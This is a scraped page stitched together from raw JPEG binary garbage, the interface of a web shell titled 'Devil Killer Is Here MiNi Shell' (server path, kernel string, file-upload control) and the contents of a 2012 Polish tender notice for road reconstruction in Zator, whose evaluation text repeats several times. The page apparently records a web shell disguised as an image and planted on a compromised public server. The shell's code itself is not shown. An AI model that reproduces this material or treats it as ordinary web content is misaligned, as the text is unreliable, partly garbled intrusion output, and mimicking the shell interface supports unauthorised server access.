JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120330/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120330/100486-N-2012.html

<p class="kh_header"><b>Zator: Odbudowa odcinka Drogi Smolice-Palczowice w Palczowicach i Smolicach, w km 1+536,72 do 2+950, na dł. ok. 1.413,3 mb, o szerokości jezdni  3,0 mb</b><br>
<b>Numer ogłoszenia: 100486 - 2012; data zamieszczenia: 30.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Zatora , Plac Marszałka Józefa Piłsuskiego 1, 32-640 Zator, woj. małopolskie, tel. 33 8412215, faks 33 84 10 206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zator.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa odcinka Drogi Smolice-Palczowice w Palczowicach i Smolicach, w km 1+536,72 do 2+950, na dł. ok. 1.413,3 mb, o szerokości jezdni  3,0 mb.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia :
Zakres rzeczowy zadania obejmuje : 
       1/ Koszty kwalifikowane : m. in. : ścinanie poboczy, częściowe korytowanie i podbudowę, skropienie istn.         nawierzchni emulsją 4.239,9 m2, wyrównanie istn. nawierzchni masą bitumiczną 424 tony, nawierzchnię         bitumiczną  4.239,9 m2, uzupełnienie pobocza 847,98 m2, oczyszczenie i profilowanie rowu 100 mb. 
        2/ Koszty niekwalifikowane : skropienie istn. nawierzchni emulsją, wyrównanie istn. nawierzchni masą         bitumiczną, nawierzchnię bitumiczną  104,5 m2, uzupełnienie pobocza 5,7 m2.
                  Wartość zamówienia - ok. 68,2 tys. euro netto.
Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym przetargiem  obejmuje także:
      - organizację, zabezpieczenie, zagospodarowanie i oznakowanie placu budowy, zgodnie z przepisami,       
      - zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów oraz przygotowanie dokumentacji         odbiorczej (atesty na materiały itp.), 
      - po zakończeniu robót, doprowadzenie placu budowy do stanu pierwotnego, demontaż obiektów       tymczasowych oraz uporządkowanie terenu,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium - 8.000,00 zł, w jednej z form opisanych w art. 45-46 ustawy, wniesione przed terminem otwarcia ofert (oryginał dokumentu złożony przed otwarciem ofert u Skarbnika Gminy, kopia dołączona do oferty). W przypadku wpłaty gotówkowej - nr konta Zamawiającego : 
     60 8136 0000 0000 1544 2000 0170  Bank Spółdzielczy w Zatorze.

Zabezpieczenie należytego wykonania umowy - 8 % ceny brutto zapisanej w umowie, w formie opisanej w art. 147-151a ustawy, z czego 30 % stanowić będzie zabezpieczenie z tytułu gwarancji jakości i rękojmi za wady.  
     Wybrany Wykonawca najpóźniej w ciągu 7 dni od daty podpisania umowy wnosi zabezpieczenie należytego      wykonania umowy, w zadeklarowanej formie, w wysokości 8 % ceny brutto przedstawionej  w umowie, z     zaokrągleniem w dół do pełnego tysiąca zł. 
    Wniesione przez Wykonawcę zabezpieczenie należytego wykonania umowy przeznaczone jest na:
- zabezpieczenie należytego wykonania robót - 70 % całości zabezpieczenia, zwrócone Wykonawcy w terminie do 30 dni od daty protokołu odbioru końcowego lub od daty  odbioru ew. usterek.
- na zabezpieczenie roszczeń z tytułu rękojmi za wady i gwarancji jakości - 30 % całości zabezpieczenia, zwrócone Wykonawcy w ciągu 15 dni od zakończenia okresu gwarancji i rękojmi.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy nakładają obowiązek posiadania takich uprawnień; 

Sposób oceny ofert.
     A/ W razie potrzeby, Komisja przetargowa będzie żądała od wykonawców wyjaśnień dot. treści złożonych     ofert oraz  dokona ew. poprawek w ofercie zgodnie z art. 87 ustawy.
    B/ W szczególności Komisja przetargowa będzie sprawdzała i oceniała kosztorysy ofertowe wg następujących      zasad :
     - Kosztorysy ofertowe co do zasady muszą być zgodne z przedmiarami w SIWZ, w zakresie podstawy      wyceny i ilości jednostek (robót) w każdej pozycji, z zastrzeżeniem poniższych uwag. 
     -  W przypadku ujawnienia większej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie      spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam.  publ. do      wartości zgodnej z przedmiarami w SIWZ, wraz z proporcjonalnym  zmniejszeniem ceny  tej pozycji, a co za      tym idzie ceny ofertowej, 
     - W przypadku ujawnienia mniejszej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie     spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam. publ. do     wartości zgodnej z przedmiarami w SIWZ, bez zmiany ceny pozycji i  ceny ofertowej. 
     - W przypadku braku pozycji w kosztorysie ofertowym, Komisja może uznać to za inną omyłkę (jeżeli na      podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie spowoduje  istotnych      zmian w treści oferty). Poprawienie takiej omyłki będzie polegało na dopisaniu odpowiedniej pozycji do      kosztorysu ofertowego, z ceną równą 0, a więc będzie to bez wpływu na cenę oferty. 
        We wszystkich 3 przypadkach komisja zawiadomi danego wykonawcę o poprawieniu omyłki. Jeżeli      Wykonawca taki nie zgłosi sprzeciwu w ciągu 3 dni od otrzymania  powyższego zawiadomienia, Komisja      uzna to za akceptację poprawek. W przypadku sprzeciwu (braku zgody na poprawienie omyłki), zgodnie z      art. 89 ust. 1 pkt 7, oferta zostanie odrzucona.

Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność złożonych dokumentów wymienionych w pkt. 2b. ogłoszenia i pkt. VI SIWZ    metodą : spełnia - nie spełnia.
     Uwaga!  Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26        ustawy) spowoduje wykluczenie z postępowania.
     Ofertę wykonawcy wykluczonego uznaje się za odrzuconą</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
-	wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, (tj. od 16.04.2007 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli, co najmniej 2 roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, (tj. 2 roboty drogowe bitumiczne na dł. min. 1.400 mb każda).
           -    kierownik budowy przewidziany do prowadzenia robót posiada uprawnienia i doświadczenie   przy         tego typu robotach od co najmniej 3 lat.

Sposób oceny ofert.
     A/ W razie potrzeby, Komisja przetargowa będzie żądała od wykonawców wyjaśnień dot. treści złożonych     ofert oraz  dokona ew. poprawek w ofercie zgodnie z art. 87 ustawy.
    B/ W szczególności Komisja przetargowa będzie sprawdzała i oceniała kosztorysy ofertowe wg następujących      zasad :
     - Kosztorysy ofertowe co do zasady muszą być zgodne z przedmiarami w SIWZ, w zakresie podstawy      wyceny i ilości jednostek (robót) w każdej pozycji, z zastrzeżeniem poniższych uwag. 
     -  W przypadku ujawnienia większej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie      spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam.  publ. do      wartości zgodnej z przedmiarami w SIWZ, wraz z proporcjonalnym  zmniejszeniem ceny  tej pozycji, a co za      tym idzie ceny ofertowej, 
     - W przypadku ujawnienia mniejszej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie     spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam. publ. do     wartości zgodnej z przedmiarami w SIWZ, bez zmiany ceny pozycji i  ceny ofertowej. 
     - W przypadku braku pozycji w kosztorysie ofertowym, Komisja może uznać to za inną omyłkę (jeżeli na      podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie spowoduje  istotnych      zmian w treści oferty). Poprawienie takiej omyłki będzie polegało na dopisaniu odpowiedniej pozycji do      kosztorysu ofertowego, z ceną równą 0, a więc będzie to bez wpływu na cenę oferty. 
        We wszystkich 3 przypadkach komisja zawiadomi danego wykonawcę o poprawieniu omyłki. Jeżeli      Wykonawca taki nie zgłosi sprzeciwu w ciągu 3 dni od otrzymania  powyższego zawiadomienia, Komisja      uzna to za akceptację poprawek. W przypadku sprzeciwu (braku zgody na poprawienie omyłki), zgodnie z      art. 89 ust. 1 pkt 7, oferta zostanie odrzucona.

Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność złożonych dokumentów wymienionych w pkt. 2b. ogłoszenia i pkt. VI SIWZ    metodą : spełnia - nie spełnia.
     Uwaga!  Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26        ustawy) spowoduje wykluczenie z postępowania.
     Ofertę wykonawcy wykluczonego uznaje się za odrzuconą</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
-	wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, (tj. od 16.04.2007 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli, co najmniej 2 roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, (tj. 2 roboty drogowe bitumiczne na dł. min. 1.400 mb każda).
           -    kierownik budowy przewidziany do prowadzenia robót posiada uprawnienia i doświadczenie   przy         tego typu robotach od co najmniej 3 lat.

Sposób oceny ofert.
     A/ W razie potrzeby, Komisja przetargowa będzie żądała od wykonawców wyjaśnień dot. treści złożonych     ofert oraz  dokona ew. poprawek w ofercie zgodnie z art. 87 ustawy.
    B/ W szczególności Komisja przetargowa będzie sprawdzała i oceniała kosztorysy ofertowe wg następujących      zasad :
     - Kosztorysy ofertowe co do zasady muszą być zgodne z przedmiarami w SIWZ, w zakresie podstawy      wyceny i ilości jednostek (robót) w każdej pozycji, z zastrzeżeniem poniższych uwag. 
     -  W przypadku ujawnienia większej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie      spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam.  publ. do      wartości zgodnej z przedmiarami w SIWZ, wraz z proporcjonalnym  zmniejszeniem ceny  tej pozycji, a co za      tym idzie ceny ofertowej, 
     - W przypadku ujawnienia mniejszej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie     spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam. publ. do     wartości zgodnej z przedmiarami w SIWZ, bez zmiany ceny pozycji i  ceny ofertowej. 
     - W przypadku braku pozycji w kosztorysie ofertowym, Komisja może uznać to za inną omyłkę (jeżeli na      podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie spowoduje  istotnych      zmian w treści oferty). Poprawienie takiej omyłki będzie polegało na dopisaniu odpowiedniej pozycji do      kosztorysu ofertowego, z ceną równą 0, a więc będzie to bez wpływu na cenę oferty. 
        We wszystkich 3 przypadkach komisja zawiadomi danego wykonawcę o poprawieniu omyłki. Jeżeli      Wykonawca taki nie zgłosi sprzeciwu w ciągu 3 dni od otrzymania  powyższego zawiadomienia, Komisja      uzna to za akceptację poprawek. W przypadku sprzeciwu (braku zgody na poprawienie omyłki), zgodnie z      art. 89 ust. 1 pkt 7, oferta zostanie odrzucona.

Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność złożonych dokumentów wymienionych w pkt. 2b. ogłoszenia i pkt. VI SIWZ    metodą : spełnia - nie spełnia.
     Uwaga!  Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26        ustawy) spowoduje wykluczenie z postępowania.
     Ofertę wykonawcy wykluczonego uznaje się za odrzuconą</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
-	wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, (tj. od 16.04.2007 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli, co najmniej 2 roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, (tj. 2 roboty drogowe bitumiczne na dł. min. 1.400 mb każda).
           -    kierownik budowy przewidziany do prowadzenia robót posiada uprawnienia i doświadczenie   przy         tego typu robotach od co najmniej 3 lat.

Sposób oceny ofert.
     A/ W razie potrzeby, Komisja przetargowa będzie żądała od wykonawców wyjaśnień dot. treści złożonych     ofert oraz  dokona ew. poprawek w ofercie zgodnie z art. 87 ustawy.
    B/ W szczególności Komisja przetargowa będzie sprawdzała i oceniała kosztorysy ofertowe wg następujących      zasad :
     - Kosztorysy ofertowe co do zasady muszą być zgodne z przedmiarami w SIWZ, w zakresie podstawy      wyceny i ilości jednostek (robót) w każdej pozycji, z zastrzeżeniem poniższych uwag. 
     -  W przypadku ujawnienia większej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie      spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam.  publ. do      wartości zgodnej z przedmiarami w SIWZ, wraz z proporcjonalnym  zmniejszeniem ceny  tej pozycji, a co za      tym idzie ceny ofertowej, 
     - W przypadku ujawnienia mniejszej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie     spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam. publ. do     wartości zgodnej z przedmiarami w SIWZ, bez zmiany ceny pozycji i  ceny ofertowej. 
     - W przypadku braku pozycji w kosztorysie ofertowym, Komisja może uznać to za inną omyłkę (jeżeli na      podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie spowoduje  istotnych      zmian w treści oferty). Poprawienie takiej omyłki będzie polegało na dopisaniu odpowiedniej pozycji do      kosztorysu ofertowego, z ceną równą 0, a więc będzie to bez wpływu na cenę oferty. 
        We wszystkich 3 przypadkach komisja zawiadomi danego wykonawcę o poprawieniu omyłki. Jeżeli      Wykonawca taki nie zgłosi sprzeciwu w ciągu 3 dni od otrzymania  powyższego zawiadomienia, Komisja      uzna to za akceptację poprawek. W przypadku sprzeciwu (braku zgody na poprawienie omyłki), zgodnie z      art. 89 ust. 1 pkt 7, oferta zostanie odrzucona.

Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność złożonych dokumentów wymienionych w pkt. 2b. ogłoszenia i pkt. VI SIWZ    metodą : spełnia - nie spełnia.
     Uwaga!  Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26        ustawy) spowoduje wykluczenie z postępowania.
     Ofertę wykonawcy wykluczonego uznaje się za odrzuconą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. 
        - zaakceptują rozliczenie umowy : max. dwiema fakturami - koszty kwalifikowane, jedną oddzielną            fakturą - koszty niekwalifikowane, płatnymi do 30 dni od ich dostarczenia.
        - przedłożą kopię aktualnej polisy lub innego dokumentu ubezpieczenia potwierdzającego, że            wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności           gospodarczej, związanej z przedmiotem zamówienia

Wykonawcy mogą wspólnie ubiegać się o udział w postępowaniu.
         - W przypadku, o którym mowa w ust. 5/ wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zam. publicznego. 
        - przepisy dot. wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w ust. 5/.
        - jeżeli oferta wykonawców, o których mowa w ust. 5/ została wybrana, zamawiający może żądać przed zawarciem umowy o zam. publiczne, umowy regulującej współpracę tych wykonawców. 

Sposób oceny ofert.
     A/ W razie potrzeby, Komisja przetargowa będzie żądała od wykonawców wyjaśnień dot. treści złożonych     ofert oraz  dokona ew. poprawek w ofercie zgodnie z art. 87 ustawy.
    B/ W szczególności Komisja przetargowa będzie sprawdzała i oceniała kosztorysy ofertowe wg następujących      zasad :
     - Kosztorysy ofertowe co do zasady muszą być zgodne z przedmiarami w SIWZ, w zakresie podstawy      wyceny i ilości jednostek (robót) w każdej pozycji, z zastrzeżeniem poniższych uwag. 
     -  W przypadku ujawnienia większej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie      spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam.  publ. do      wartości zgodnej z przedmiarami w SIWZ, wraz z proporcjonalnym  zmniejszeniem ceny  tej pozycji, a co za      tym idzie ceny ofertowej, 
     - W przypadku ujawnienia mniejszej liczby jednostek (robót) w danej pozycji, Komisja może uznać to za      inną omyłkę (jeżeli na podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie     spowoduje istotnych zmian w treści oferty) i poprawić na podst. art. 87 ust. 2 pkt 3 ustawy prawo zam. publ. do     wartości zgodnej z przedmiarami w SIWZ, bez zmiany ceny pozycji i  ceny ofertowej. 
     - W przypadku braku pozycji w kosztorysie ofertowym, Komisja może uznać to za inną omyłkę (jeżeli na      podstawie posiadanej wiedzy i kosztorysu inwestorskiego uzna, że jej poprawienie nie spowoduje  istotnych      zmian w treści oferty). Poprawienie takiej omyłki będzie polegało na dopisaniu odpowiedniej pozycji do      kosztorysu ofertowego, z ceną równą 0, a więc będzie to bez wpływu na cenę oferty. 
        We wszystkich 3 przypadkach komisja zawiadomi danego wykonawcę o poprawieniu omyłki. Jeżeli      Wykonawca taki nie zgłosi sprzeciwu w ciągu 3 dni od otrzymania  powyższego zawiadomienia, Komisja      uzna to za akceptację poprawek. W przypadku sprzeciwu (braku zgody na poprawienie omyłki), zgodnie z      art. 89 ust. 1 pkt 7, oferta zostanie odrzucona.

Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność złożonych dokumentów wymienionych w pkt. 2b. ogłoszenia i pkt. VI SIWZ    metodą : spełnia - nie spełnia.
     Uwaga!  Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26        ustawy) spowoduje wykluczenie z postępowania.
     Ofertę wykonawcy wykluczonego uznaje się za odrzuconą</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

